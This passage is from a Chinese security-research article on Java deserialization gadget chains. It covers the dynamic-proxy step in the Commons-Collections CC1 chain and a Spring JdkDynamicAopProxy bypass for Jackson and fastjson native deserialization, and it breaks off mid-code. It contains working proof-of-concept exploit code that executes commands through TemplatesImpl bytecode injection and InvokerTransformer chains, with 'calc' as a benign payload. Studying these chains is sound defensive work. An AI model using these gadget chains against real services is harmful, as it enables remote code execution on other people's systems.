chars[0] = (char)(chars[0] + 32);
}
String fieldName = new String(chars);
if (fieldName.isEmpty()) {
throw new JSONException("This method '" + methodName + "' is an illegal getter");
}
value = this.get(fieldName);
if (value == null) {
return null;
}
```
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-7e60e01fad04aa6d9691e48c1c21c35b498d7b25.png)
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-aaf64a831d90f81a17a0a7cd236ef8e3324b0683.png)
可以看出来是取出了我们的对象,成功达成目的
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-51ccf2ed066e656539d343500e6f30b882db1940.png)
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-e5388b8cf01a4cf3c3bc95e95ed0d0549446824c.png)
最后成功达成目的</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h1 blockindex=0>fastjson 原生反序列化配合动态代理绕过限制</h1>
<h2 blockindex=1>前言</h2>
<p blockindex=2>对于动态代理,只记得 cc1 接触过一次,然后就没有怎么碰到过了,而且动态代理似乎利用面还是比较广的,许多关键时刻都会使用到,这里正好来重新学习学习,还记得入门 java 的时候动态代理就学了半天,感觉确实很抽象</p>
<h2 blockindex=3>cc1 动态代理初识</h2>
<p blockindex=4>首先是我们的调用链</p>
<pre blockindex=5><code class="hljs language-php">AnnotationInvocationHan.readobject--proxy.entryset--AnnotationInvocationHan.invoke--LazyMap.get--chainedTransformer.transformer....
</code></pre>
<p blockindex=6><strong>POC</strong></p>
<pre blockindex=7><code class="hljs language-php">package cc1;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>CC1lazy</span> </span>{
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> main(<span class=hljs-keyword>String</span>[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, ClassNotFoundException, InstantiationException {
<span class=hljs-comment>//定义一系列Transformer对象,组成一个变换链</span>
Transformer[] transformers = <span class=hljs-keyword>new</span> Transformer[]{
<span class=hljs-comment>//返回Runtime.class</span>
<span class=hljs-keyword>new</span> ConstantTransformer(Runtime.<span class=hljs-keyword>class</span>),
<span class=hljs-comment>//通过反射调用getRuntime()方法获取Runtime对象</span>
<span class=hljs-keyword>new</span> InvokerTransformer(<span class=hljs-string>"getMethod"</span>, <span class=hljs-keyword>new</span> <span class=hljs-class><span class=hljs-keyword>Class</span>[]</span>{<span class=hljs-keyword>String</span>.<span class=hljs-keyword>class</span>, <span class=hljs-class><span class=hljs-keyword>Class</span>[].<span class=hljs-title>class</span>}, <span class=hljs-title>new</span> <span class=hljs-title>Object</span>[]</span>{<span class=hljs-string>"getRuntime"</span>,<span class=hljs-literal>null</span>}),
<span class=hljs-comment>//通过反射调用invoke()方法</span>
<span class=hljs-keyword>new</span> InvokerTransformer(<span class=hljs-string>"invoke"</span>, <span class=hljs-keyword>new</span> <span class=hljs-class><span class=hljs-keyword>Class</span>[]</span>{<span class=hljs-keyword>Object</span>.<span class=hljs-keyword>class</span>, <span class=hljs-keyword>Object</span>[].<span class=hljs-keyword>class</span>}, <span class=hljs-keyword>new</span> <span class=hljs-keyword>Object</span>[]{<span class=hljs-literal>null</span>, <span class=hljs-literal>null</span>}),
<span class=hljs-comment>//通过反射调用exec()方法启动notepad</span>
<span class=hljs-keyword>new</span> InvokerTransformer(<span class=hljs-string>"exec"</span>, <span class=hljs-keyword>new</span> <span class=hljs-class><span class=hljs-keyword>Class</span>[]</span>{<span class=hljs-keyword>String</span>.<span class=hljs-keyword>class</span>}, <span class=hljs-keyword>new</span> <span class=hljs-keyword>Object</span>[]{<span class=hljs-string>"calc"</span>})
};
<span class=hljs-comment>//将多个Transformer对象组合成一个链</span>
ChainedTransformer chainedTransformer = <span class=hljs-keyword>new</span> ChainedTransformer(transformers);
HashMap hash = <span class=hljs-keyword>new</span> HashMap&amp;lt;&amp;gt;();
<span class=hljs-comment>//使用chainedTransformer装饰HashMap生成新的Map</span>
Map decorate = LazyMap.decorate(hash, chainedTransformer);
<span class=hljs-comment>//通过反射获取AnnotationInvocationHandler类的构造方法</span>
<span class=hljs-class><span class=hljs-keyword>Class</span> <span class=hljs-title>c</span> = <span class=hljs-title>Class</span>.<span class=hljs-title>forName</span>("<span class=hljs-title>sun</span>.<span class=hljs-title>reflect</span>.<span class=hljs-title>annotation</span>.<span class=hljs-title>AnnotationInvocationHandler</span>");
<span class=hljs-title>Constructor</span> <span class=hljs-title>constructor</span> = <span class=hljs-title>c</span>.<span class=hljs-title>getDeclaredConstructor</span>(<span class=hljs-title>Class</span>.<span class=hljs-title>class</span>, <span class=hljs-title>Map</span>.<span class=hljs-title>class</span>);
//设置构造方法为可访问的
<span class=hljs-title>constructor</span>.<span class=hljs-title>setAccessible</span>(<span class=hljs-title>true</span>);
//通过反射创建 <span class=hljs-title>Override</span> 类的代理对象 <span class=hljs-title>instance</span>,并设置其调用会委托给 <span class=hljs-title>decorate</span> 对象
<span class=hljs-title>InvocationHandler</span> <span class=hljs-title>instance</span> = (<span class=hljs-title>InvocationHandler</span>) <span class=hljs-title>constructor</span>.<span class=hljs-title>newInstance</span>(<span class=hljs-title>Override</span>.<span class=hljs-title>class</span>, <span class=hljs-title>decorate</span>);
//因为<span class=hljs-title>AnnotationInvocationHandler</span>是继承了代理接口的,所以可以直接使用它的构造器去构造一个代理的处理器,但是需要强转
//创建<span class=hljs-title>Map</span>接口的代理对象<span class=hljs-title>proxyInstance</span>,并设置其调用处理器为<span class=hljs-title>instance</span>
<span class=hljs-title>Map</span> <span class=hljs-title>proxyInstance</span> = (<span class=hljs-title>Map</span>) <span class=hljs-title>Proxy</span>.<span class=hljs-title>newProxyInstance</span>(<span class=hljs-title>Map</span>.<span class=hljs-title>class</span>.<span class=hljs-title>getClassLoader</span>(), <span class=hljs-title>new</span> <span class=hljs-title>Class</span>[]</span>{Map.<span class=hljs-keyword>class</span>}, instance);
<span class=hljs-comment>//再次通过反射创建代理对象</span>
<span class=hljs-keyword>Object</span> o = constructor.newInstance(Override.<span class=hljs-keyword>class</span>, proxyInstance);
serialize(o);
unserialize(<span class=hljs-string>"1.bin"</span>);
}
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> serialize(<span class=hljs-keyword>Object</span> obj) throws IOException {
ObjectOutputStream out = <span class=hljs-keyword>new</span> ObjectOutputStream(Files.newOutputStream(Paths.get(<span class=hljs-string>"1.bin"</span>)));
out.writeObject(obj);
}
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> unserialize(<span class=hljs-keyword>String</span> filename) throws IOException, ClassNotFoundException {
ObjectInputStream out = <span class=hljs-keyword>new</span> ObjectInputStream(Files.newInputStream(Paths.get(filename)));
out.readObject();
}
}
</code></pre>
<p blockindex=8>这里我们只对动态代理的部分做分析</p>
<p blockindex=9>这里本来的目的是寻找一个能够嫁接调用 get 的地方</p>
<p blockindex=10>找到了 AnnotationInvocationHandler 的 invoke 方法</p>
<pre blockindex=11><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-keyword>Object</span> invoke(<span class=hljs-keyword>Object</span> var1, Method var2, <span class=hljs-keyword>Object</span>[] var3) {
<span class=hljs-keyword>String</span> var4 = var2.getName();
<span class=hljs-class><span class=hljs-keyword>Class</span>[] <span class=hljs-title>var5</span> = <span class=hljs-title>var2</span>.<span class=hljs-title>getParameterTypes</span>();
<span class=hljs-title>if</span> (<span class=hljs-title>var4</span>.<span class=hljs-title>equals</span>("<span class=hljs-title>equals</span>") &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; <span class=hljs-title>var5</span>.<span class=hljs-title>length</span> == 1 &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; <span class=hljs-title>var5</span>[0] == <span class=hljs-title>Object</span>.<span class=hljs-title>class</span>) </span>{
<span class=hljs-keyword>return</span> this.equalsImpl(var3[<span class=hljs-number>0</span>]);
} <span class=hljs-keyword>else</span> <span class=hljs-keyword>if</span> (var5.length != <span class=hljs-number>0</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> <span class=hljs-built_in>AssertionError</span>(<span class=hljs-string>"Too many parameters for an annotation method"</span>);
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>switch</span> (var4) {
<span class=hljs-keyword>case</span> <span class=hljs-string>"toString"</span>:
<span class=hljs-keyword>return</span> this.toStringImpl();
<span class=hljs-keyword>case</span> <span class=hljs-string>"hashCode"</span>:
<span class=hljs-keyword>return</span> this.hashCodeImpl();
<span class=hljs-keyword>case</span> <span class=hljs-string>"annotationType"</span>:
<span class=hljs-keyword>return</span> this.type;
<span class=hljs-keyword>default</span>:
<span class=hljs-keyword>Object</span> var6 = this.memberValues.get(var4);
<span class=hljs-keyword>if</span> (var6 == <span class=hljs-literal>null</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> IncompleteAnnotationException(this.type, var4);
} <span class=hljs-keyword>else</span> <span class=hljs-keyword>if</span> (var6 <span class=hljs-keyword>instanceof</span> ExceptionProxy) {
<span class=hljs-keyword>throw</span> ((ExceptionProxy)var6).generateException();
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>if</span> (var6.getClass().isArray() &amp;amp;&amp;amp; <span class=hljs-keyword>Array</span>.getLength(var6) != <span class=hljs-number>0</span>) {
var6 = this.cloneArray(var6);
}
<span class=hljs-keyword>return</span> var6;
}
}
}
}
</code></pre>
<p blockindex=12>只需要它的 memberValues 可以控制就 ok</p>
<p blockindex=13>所以就回到了如何触发 invoke 的问题上来了</p>
<p blockindex=14><img src=
<p blockindex=15>可以看到他 implements 了InvocationHandler 这个接口,说明这个类也可以动态代理</p>
<p blockindex=16>因为实现了这个接口必须重写一个 invoke 方法,而且方法会在代理对象的方法被调用时执行,所以我们如果创建一个动态代理,而且把它作为代理的处理器,那么就可以成功的触发 invoke 方法<br>
我们知道因为动态代理的缘故,只要有代理对象的方法被触发,他也会触发。</p>
<p blockindex=17>具体的 cc1 的细节我们就不看了,关键就是如何出的 invoke 方法</p>
<p blockindex=18>接下来是怎么创建一个代理,来把这个类作为代理对象?我们只要使用 Proxy 创建一个代理实例,将我们构造的 AnnotationInvocationHandler 对象作为调用处理器传入。代理什么?</p>
<p blockindex=19>由于 AnnotationInvocationHandler.readObject() 是反序列化的入口,我们需要通过 AnnotationInvocationHandler 来包装由 Proxy 创建的代理对象,并将其重新序列化。<br>
在反序列化时memberValues 的 entrySet() 方法会被调用,而我们希望 memberValues 内部存储的代理对象能够触发 invoke() 方法,从而进入我们构造的链条。<br>
因为 memberValues 是一个 Map 类型,所以我们需要通过 Proxy 创建一个 Map 类型的代理对象。</p>
<p blockindex=20>简单的调试看看调用栈</p>
<pre blockindex=21><code class="hljs language-php">invoke:<span class=hljs-number>57</span>, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-<span class=hljs-number>1</span>, <span class=hljs-variable>$Proxy1</span> (com.sun.proxy)
readObject:<span class=hljs-number>444</span>, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-<span class=hljs-number>1</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>62</span>, NativeMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>43</span>, DelegatingMethodAccessorImpl (sun.reflect)
invoke:<span class=hljs-number>497</span>, Method (java.lang.reflect)
invokeReadObject:<span class=hljs-number>1058</span>, ObjectStreamClass (java.io)
readSerialData:<span class=hljs-number>1900</span>, ObjectInputStream (java.io)
readOrdinaryObject:<span class=hljs-number>1801</span>, ObjectInputStream (java.io)
readObject0:<span class=hljs-number>1351</span>, ObjectInputStream (java.io)
readObject:<span class=hljs-number>371</span>, ObjectInputStream (java.io)
unserialize:<span class=hljs-number>67</span>, CC1lazy (cc1)
main:<span class=hljs-number>57</span>, CC1lazy (cc1)
</code></pre>
<p blockindex=22>这里因为调用了 public abstract java.util.Set java.util.Map.entrySet()触发了动态代理<br>
调用代理的 invoke 方法,从而接起了后面的链子</p>
<h2 blockindex=23>JdkDynamicAopProxy 代理绕过</h2>
<p blockindex=24>当然上面的代理虽然是我们链子中的常客,但是限制还是很大的,因为在高版本的 jdk 改了</p>
<p blockindex=25>这里我们看看这个动态代理类</p>
<p blockindex=26>首先如何寻找这种代理呢</p>
<p blockindex=27>其实很简单,只需要实现我们的接口,我们找接口的实现类</p>
<p blockindex=28><img src="
<p blockindex=29>但是限制就是需要我们存在依赖</p>
<p blockindex=30>网上找了一下,发现以前见过,网上公开的利用就是在 jackson 原生反序列化的时候</p>
<p blockindex=31>参考<a href="https://xz.aliyun.com/t/12846?time%5C_%5C_1311=GqGxuDcDRGexlxx2DU27oDkmD8SGCmzmeD">https://xz.aliyun.com/t/12846?time\_\_1311=GqGxuDcDRGexlxx2DU27oDkmD8SGCmzmeD</a><br>
是为了解决 jackson 原生不稳定的痛点</p>
<p blockindex=32>正常的调用链</p>
<pre blockindex=33><code class="hljs language-php">package org.jackson;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>EXP</span> </span>{
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> main(<span class=hljs-keyword>String</span>[] args) throws <span class=hljs-built_in>Exception</span> {
ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.makeClass(<span class=hljs-string>"a"</span>);
CtClass superClass = pool.get(AbstractTranslet.<span class=hljs-keyword>class</span>.getName());
ctClass.setSuperclass(superClass);
CtConstructor constructor = <span class=hljs-keyword>new</span> CtConstructor(<span class=hljs-keyword>new</span> CtClass[]{},ctClass);
constructor.setBody(<span class=hljs-string>"Runtime.getRuntime().exec(\"calc\");"</span>);
ctClass.addConstructor(constructor);
byte[] bytes = ctClass.toBytecode();
Templates templatesImpl = <span class=hljs-keyword>new</span> TemplatesImpl();
setFieldValue(templatesImpl, <span class=hljs-string>"_bytecodes"</span>, <span class=hljs-keyword>new</span> byte[][]{bytes});
setFieldValue(templatesImpl, <span class=hljs-string>"_name"</span>, <span class=hljs-string>"xxx"</span>);
setFieldValue(templatesImpl, <span class=hljs-string>"_tfactory"</span>, <span class=hljs-literal>null</span>);
POJONode jsonNodes = <span class=hljs-keyword>new</span> POJONode(templatesImpl);
BadAttributeValueExpException exp = <span class=hljs-keyword>new</span> BadAttributeValueExpException(<span class=hljs-literal>null</span>);
Field val = <span class=hljs-keyword>Class</span>.forName(<span class=hljs-string>"javax.management.BadAttributeValueExpException"</span>).getDeclaredField(<span class=hljs-string>"val"</span>);
val.setAccessible(<span class=hljs-literal>true</span>);
val.set(exp,jsonNodes);
ByteArrayOutputStream barr = <span class=hljs-keyword>new</span> ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = <span class=hljs-keyword>new</span> ObjectOutputStream(barr);
objectOutputStream.writeObject(exp);
FileOutputStream fout=<span class=hljs-keyword>new</span> FileOutputStream(<span class=hljs-string>"1.ser"</span>);
fout.write(barr.toByteArray());
fout.close();
FileInputStream fileInputStream = <span class=hljs-keyword>new</span> FileInputStream(<span class=hljs-string>"1.ser"</span>);
System.out.println(serial(exp));
deserial(serial(exp));
}
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>String</span> serial(<span class=hljs-keyword>Object</span> o) throws IOException, NoSuchFieldException {
ByteArrayOutputStream baos = <span class=hljs-keyword>new</span> ByteArrayOutputStream();
ObjectOutputStream oos = <span class=hljs-keyword>new</span> ObjectOutputStream(baos);
oos.writeObject(o);
oos.close();
<span class=hljs-keyword>String</span> base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
<span class=hljs-keyword>return</span> base64String;
}
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> deserial(<span class=hljs-keyword>String</span> data) throws <span class=hljs-built_in>Exception</span> {
byte[] base64decodedBytes = Base64.getDecoder().decode(data);
ByteArrayInputStream bais = <span class=hljs-keyword>new</span> ByteArrayInputStream(base64decodedBytes);
ObjectInputStream ois = <span class=hljs-keyword>new</span> ObjectInputStream(bais);
ois.readObject();
ois.close();
}
<span class=hljs-keyword>private</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> setFieldValue(<span class=hljs-keyword>Object</span> obj, <span class=hljs-keyword>String</span> field, <span class=hljs-keyword>Object</span> arg) throws <span class=hljs-built_in>Exception</span>{
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(<span class=hljs-literal>true</span>);
f.set(obj, arg);
}
}
</code></pre>
<p blockindex=34>但是会爆错</p>
<pre blockindex=35><code class="hljs language-php">Caused by: java.lang.NullPointerException
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getStylesheetDOM(TemplatesImpl.java:<span class=hljs-number>450</span>)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:<span class=hljs-number>62</span>)
</code></pre>
<p blockindex=36>爆指针的问题</p>
<p blockindex=37>是因为<br>
在调用 getter 方法的时候,是根据 props 的顺序来决定的</p>
<pre blockindex=38><code class="hljs language-php"><span class=hljs-keyword>protected</span> <span class=hljs-keyword>void</span> serializeFields(<span class=hljs-keyword>Object</span> bean, JsonGenerator gen, SerializerProvider provider)
throws IOException
{
<span class=hljs-keyword>final</span> BeanPropertyWriter[] props;
<span class=hljs-keyword>if</span> (_filteredProps != <span class=hljs-literal>null</span> &amp;amp;&amp;amp; provider.getActiveView() != <span class=hljs-literal>null</span>) {
props = _filteredProps;
} <span class=hljs-keyword>else</span> {
props = _props;
}
<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>;
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>final</span> <span class=hljs-keyword>int</span> len = props.length; i &amp;lt; len; ++i) {
BeanPropertyWriter prop = props[i];
<span class=hljs-keyword>if</span> (prop != <span class=hljs-literal>null</span>) { <span class=hljs-comment>// can have nulls in filtered list</span>
prop.serializeAsField(bean, gen, provider);
}
}
<span class=hljs-keyword>if</span> (_anyGetterWriter != <span class=hljs-literal>null</span>) {
_anyGetterWriter.getAndSerialize(bean, gen, provider);
}
} <span class=hljs-keyword>catch</span> (<span class=hljs-built_in>Exception</span> e) {
<span class=hljs-keyword>String</span> name = (i == props.length) ? <span class=hljs-string>"[anySetter]"</span> : props[i].getName();
wrapAndThrow(provider, e, bean, name);
} <span class=hljs-keyword>catch</span> (StackOverflowError e) {
...
}
}
</code></pre>
<p blockindex=39>顺序不固定</p>
<pre blockindex=40><code class="hljs language-php">transletindex
stylesheetDOM
outputProperties
</code></pre>
<p blockindex=41><code>stylesheetDOM</code><code>outputProperties</code> 之前,所以 <code>getStylesheetDOM</code> 会先于 <code>getOutputProperties</code> 触发。当 <code>getStylesheetDOM</code> 方法先被触发时,由于 <code>_sdom</code> 成员为空,会导致空指针报错,反序列化攻击失败。</p>
<p blockindex=42>所以我们利用 JdkDynamicAopProxy 类来代理就是为了解决不稳定痛点</p>
<p blockindex=43>我们看到它的 invoke 方法</p>
<pre blockindex=44><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-keyword>Object</span> invoke(<span class=hljs-keyword>Object</span> proxy, Method method, <span class=hljs-keyword>Object</span>[] args) throws <span class=hljs-built_in>Throwable</span> {
<span class=hljs-keyword>Object</span> oldProxy = <span class=hljs-literal>null</span>;
<span class=hljs-keyword>boolean</span> setProxyContext = <span class=hljs-literal>false</span>;
TargetSource targetSource = this.advised.targetSource;
<span class=hljs-keyword>Object</span> target = <span class=hljs-literal>null</span>;
<span class=hljs-keyword>Object</span> retVal;
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>if</span> (!this.equalsDefined &amp;amp;&amp;amp; AopUtils.isEqualsMethod(method)) {
<span class=hljs-keyword>Boolean</span> var18 = this.equals(args[<span class=hljs-number>0</span>]);
<span class=hljs-keyword>return</span> var18;
}
<span class=hljs-keyword>if</span> (!this.hashCodeDefined &amp;amp;&amp;amp; AopUtils.isHashCodeMethod(method)) {
<span class=hljs-keyword>Integer</span> var17 = this.hashCode();
<span class=hljs-keyword>return</span> var17;
}
<span class=hljs-keyword>if</span> (method.getDeclaringClass() == DecoratingProxy.<span class=hljs-keyword>class</span>) {
<span class=hljs-class><span class=hljs-keyword>Class</span> <span class=hljs-title>var16</span> = <span class=hljs-title>AopProxyUtils</span>.<span class=hljs-title>ultimateTargetClass</span>(<span class=hljs-title>this</span>.<span class=hljs-title>advised</span>);
<span class=hljs-title>return</span> <span class=hljs-title>var16</span>;
}
<span class=hljs-title>if</span> (<span class=hljs-title>this</span>.<span class=hljs-title>advised</span>.<span class=hljs-title>opaque</span> || !<span class=hljs-title>method</span>.<span class=hljs-title>getDeclaringClass</span>().<span class=hljs-title>isInterface</span>() || !<span class=hljs-title>method</span>.<span class=hljs-title>getDeclaringClass</span>().<span class=hljs-title>isAssignableFrom</span>(<span class=hljs-title>Advised</span>.<span class=hljs-title>class</span>)) </span>{
<span class=hljs-keyword>if</span> (this.advised.exposeProxy) {
oldProxy = AopContext.setCurrentProxy(proxy);
setProxyContext = <span class=hljs-literal>true</span>;
}
target = targetSource.getTarget();
<span class=hljs-class><span class=hljs-keyword>Class</span>&amp;<span class=hljs-title>lt</span>;?&amp;<span class=hljs-title>gt</span>; <span class=hljs-title>targetClass</span> = <span class=hljs-title>target</span> != <span class=hljs-title>null</span> ? <span class=hljs-title>target</span>.<span class=hljs-title>getClass</span>() : <span class=hljs-title>null</span>;
<span class=hljs-title>List</span> <span class=hljs-title>chain</span> = <span class=hljs-title>this</span>.<span class=hljs-title>advised</span>.<span class=hljs-title>getInterceptorsAndDynamicInterceptionAdvice</span>(<span class=hljs-title>method</span>, <span class=hljs-title>targetClass</span>);
<span class=hljs-title>if</span> (<span class=hljs-title>chain</span>.<span class=hljs-title>isEmpty</span>()) </span>{
<span class=hljs-keyword>Object</span>[] argsToUse = AopProxyUtils.adaptArgumentsIfNecessary(method, args);
retVal = AopUtils.invokeJoinpointUsingReflection(target, method, argsToUse);
} <span class=hljs-keyword>else</span> {
MethodInvocation invocation = <span class=hljs-keyword>new</span> ReflectiveMethodInvocation(proxy, target, method, args, targetClass, chain);
retVal = invocation.proceed();
}
<span class=hljs-class><span class=hljs-keyword>Class</span>&amp;<span class=hljs-title>lt</span>;?&amp;<span class=hljs-title>gt</span>; <span class=hljs-title>returnType</span> = <span class=hljs-title>method</span>.<span class=hljs-title>getReturnType</span>();
<span class=hljs-title>if</span> (<span class=hljs-title>retVal</span> != <span class=hljs-title>null</span> &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; <span class=hljs-title>retVal</span> == <span class=hljs-title>target</span> &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; <span class=hljs-title>returnType</span> != <span class=hljs-title>Object</span>.<span class=hljs-title>class</span> &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; <span class=hljs-title>returnType</span>.<span class=hljs-title>isInstance</span>(<span class=hljs-title>proxy</span>) &amp;<span class=hljs-title>amp</span>;&amp;<span class=hljs-title>amp</span>; !<span class=hljs-title>RawTargetAccess</span>.<span class=hljs-title>class</span>.<span class=hljs-title>isAssignableFrom</span>(<span class=hljs-title>method</span>.<span class=hljs-title>getDeclaringClass</span>())) </span>{
retVal = proxy;
} <span class=hljs-keyword>else</span> <span class=hljs-keyword>if</span> (retVal == <span class=hljs-literal>null</span> &amp;amp;&amp;amp; returnType != <span class=hljs-keyword>Void</span>.TYPE &amp;amp;&amp;amp; returnType.isPrimitive()) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> AopInvocationException(<span class=hljs-string>"Null return value from advice does not match primitive return type for: "</span> + method);
}
<span class=hljs-keyword>Object</span> var12 = retVal;
<span class=hljs-keyword>return</span> var12;
}
retVal = AopUtils.invokeJoinpointUsingReflection(this.advised, method, args);
} <span class=hljs-keyword>finally</span> {
<span class=hljs-keyword>if</span> (target != <span class=hljs-literal>null</span> &amp;amp;&amp;amp; !targetSource.isStatic()) {
targetSource.releaseTarget(target);
}
<span class=hljs-keyword>if</span> (setProxyContext) {
AopContext.setCurrentProxy(oldProxy);
}
}
<span class=hljs-keyword>return</span> retVal;
}
</code></pre>
<p blockindex=45>最后会返回一个 retVal 对象,而这个对象是</p>
<pre blockindex=46><code class="hljs language-php">AopUtils.invokeJoinpointUsingReflection(this.advised, method, args)
</code></pre>
<p blockindex=47>得来的,跟进 invokeJoinpointUsingReflection 方法<br>
<img src=
<p blockindex=48>可以看到可以反射调用方法</p>
<p blockindex=49><code>advised</code> 成员是一个 <code>org.springframework.aop.framework.AdvisedSupport</code> 类型的对象,它的 <code>targetSource</code> 成员中保存了 <code>JdkDynamicAopProxy</code> 类代理的接口的实现类。</p>
<p blockindex=50>思路就是</p>
<pre blockindex=51><code class="hljs language-php"><span class=hljs-number>1</span>. 构造一个 `JdkDynamicAopProxy` 类型的对象,将 `TemplatesImpl` 类型的对象设置为 `targetSource`
<span class=hljs-number>2</span>. 使用这个 `JdkDynamicAopProxy` 类型的对象构造一个代理类,代理 `javax.xml.transform.Templates` 接口
<span class=hljs-number>3</span>. JSON 序列化库只能从这个 `JdkDynamicAopProxy` 类型的对象上找到 `getOutputProperties` 方法
<span class=hljs-number>4</span>. 通过代理类的 `invoke` 机制,触发 `TemplatesImpl<span class=hljs-comment>#getOutputProperties` 方法,实现恶意类加载</span>
</code></pre>
<p blockindex=52>我们举一反三,使用在 fastjson 的原生反序列化中</p>
<p blockindex=53>替代 TemplatesImpl 并不容易,主要是因为要么所需的依赖库较为冷门,或者对版本的要求较为严格,要么是替代品的使用方式并不直观或不够灵活。</p>
<p blockindex=54>因此,换一种思路,我尝试在 JsonArray 和 TemplatesImpl 之间引入一个“中间层”,作为一个连接桥梁,这样既避免了直接替换 TemplatesImpl 的复杂性,又能够实现所需的功能</p>
<p blockindex=55>这里我们调试一下文章给出的代码</p>
<pre blockindex=56><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>Fastjson4_JdkDynamicAopProxy</span> </span>{
<span class=hljs-keyword>public</span> <span class=hljs-keyword>Object</span> getObject (<span class=hljs-keyword>String</span> cmd) throws <span class=hljs-built_in>Exception</span> {
<span class=hljs-keyword>Object</span> node1 = TemplatesImplNode.makeGadget(cmd);
<span class=hljs-keyword>Object</span> node2 = JdkDynamicAopProxyNode.makeGadget(node1);
Proxy proxy = (Proxy) Proxy.newProxyInstance(Proxy.<span class=hljs-keyword>class</span>.getClassLoader(),
<span class=hljs-keyword>new</span> <span class=hljs-class><span class=hljs-keyword>Class</span>[]</span>{Templates.<span class=hljs-keyword>class</span>}, (InvocationHandler)node2);
<span class=hljs-keyword>Object</span> node3 = JsonArrayNode.makeGadget(<span class=hljs-number>2</span>,proxy);
<span class=hljs-keyword>Object</span> node4 = BadAttrValExeNode.makeGadget(node3);
<span class=hljs-keyword>Object</span>[] <span class=hljs-keyword>array</span> = <span class=hljs-keyword>new</span> <span class=hljs-keyword>Object</span>[]{node1,node4};
<span class=hljs-keyword>Object</span> node5 = HashMapNode.makeGadget(<span class=hljs-keyword>array</span>);
<span class=hljs-keyword>return</span> node5;
}
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>void</span> main(<span class=hljs-keyword>String</span>[] args) throws <span class=hljs-built_in>Exception</span> {
<span class=hljs-keyword>Object</span> <span class=hljs-keyword>object</span> = <span class=hljs-keyword>new</span> Fastjson4_JdkDynamicAopProxy().getObject(Util.getDefaultTestCmd());
Util.runGadgets(<span class=hljs-keyword>object</span>);
}
}
</code></pre>
<p blockindex=57>可以很直观的看到是代理了 Templates 接口</p>
<p blockindex=58>在代理类的构造中</p>
<pre blockindex=59><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>JdkDynamicAopProxyNode</span> </span>{
<span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-keyword>Object</span> makeGadget(<span class=hljs-keyword>Object</span> gadget) throws <span class=hljs-built_in>Exception</span> {
AdvisedSupport <span class=hljs-keyword>as</span> = <span class=hljs-keyword>new</span> AdvisedSupport();
<span class=hljs-keyword>as</span>.setTargetSource(<span class=hljs-keyword>new</span> SingletonTargetSource(gadget));
